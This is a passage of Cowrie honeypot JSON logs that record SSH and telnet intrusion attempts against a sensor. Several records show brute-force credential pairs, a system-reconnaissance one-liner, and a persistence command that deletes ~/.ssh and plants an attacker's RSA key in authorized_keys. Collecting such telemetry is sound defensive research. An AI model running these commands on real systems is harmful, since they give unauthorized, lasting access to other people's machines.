9","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:31.795336Z","src_ip":"212.227.235.229","session":"fbb39e5591ec"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"password","message":"login attempt [sshd/password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:48:32.902405Z","src_ip":"212.227.235.229","session":"fbb39e5591ec"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:34.172411Z","src_ip":"212.227.235.229","session":"fbb39e5591ec"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39704,"dst_ip":"1.2.3.4","dst_port":22,"session":"5693aef94d0e","protocol":"ssh","message":"New connection: 134.199.174.250:39704 (1.2.3.4:22) [session: 5693aef94d0e]","sensor":"my-vps","timestamp":"2025-09-08T12:48:51.462422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:48:51.463339Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:48:51.788210Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49695,"dst_ip":"1.2.3.4","dst_port":23,"session":"f43a8d3b4a0b","protocol":"telnet","message":"New connection: 212.227.235.229:49695 (1.2.3.4:23) [session: f43a8d3b4a0b]","sensor":"my-vps","timestamp":"2025-09-08T12:48:52.660570Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:48:52.712880Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:48:53.363441Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.364131Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.364742Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.365970Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.366975Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.367985Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.369261Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.370559Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.371087Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.371582Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.372072Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.372693Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.373243Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.680455Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.681324Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:53.682345Z","src_ip":"134.199.174.250","session":"5693aef94d0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37888,"dst_ip":"1.2.3.4","dst_port":22,"session":"c26455b16b74","protocol":"ssh","message":"New connection: 212.227.235.229:37888 (1.2.3.4:22) [session: c26455b16b74]","sensor":"my-vps","timestamp":"2025-09-08T12:48:56.141836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:56.144538Z","src_ip":"212.227.235.229","session":"c26455b16b74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:56.440850Z","src_ip":"212.227.235.229","session":"c26455b16b74"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T12:48:57.627300Z","src_ip":"212.227.235.229","session":"c26455b16b74"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":49396,"dst_ip":"1.2.3.4","dst_port":22,"session":"37a6e4a538bc","protocol":"ssh","message":"New connection: 139.59.14.27:49396 (1.2.3.4:22) [session: 37a6e4a538bc]","sensor":"my-vps","timestamp":"2025-09-08T12:48:57.802150Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:48:57.802976Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:48:58.156152Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:48:58.924586Z","src_ip":"212.227.235.229","session":"c26455b16b74"}
{"eventid":"cowrie.login.success","username":"root","password":"lala","message":"login attempt [root/lala] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:48:59.595835Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:49:00.321821Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:49:00.322565Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:49:00.323674Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:00.672807Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:49:01.468717Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:49:01.469529Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:49:01.827961Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:49:01.829008Z","src_ip":"139.59.14.27","session":"37a6e4a538bc"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":54216,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ad08762911d","protocol":"ssh","message":"New connection: 139.59.14.27:54216 (1.2.3.4:22) [session: 8ad08762911d]","sensor":"my-vps","timestamp":"2025-09-08T12:49:02.163031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:02.164060Z","src_ip":"139.59.14.27","session":"8ad08762911d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:49:02.492462Z","src_ip":"139.59.14.27","session":"8ad08762911d"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.196.182","src_port":48270,"dst_ip":"1.2.3.4","dst_port":22,"session":"cefb7b3e371f","protocol":"ssh","message":"New connection: 45.78.196.182:48270 (1.2.3.4:22) [session: cefb7b3e371f]","sensor":"my-vps","timestamp":"2025-09-08T12:49:02.580412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:49:02.581351Z","src_ip":"45.78.196.182","session":"cefb7b3e371f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-08T12:49:02.769522Z","src_ip":"45.78.196.182","session":"cefb7b3e371f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57576,"dst_ip":"1.2.3.4","dst_port":22,"session":"32bddd5df926","protocol":"ssh","message":"New connection: 212.227.235.229:57576 (1.2.3.4:22) [session: 32bddd5df926]","sensor":"my-vps","timestamp":"2025-09-08T12:49:03.298738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:49:03.299883Z","src_ip":"212.227.235.229","session":"32bddd5df926"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecd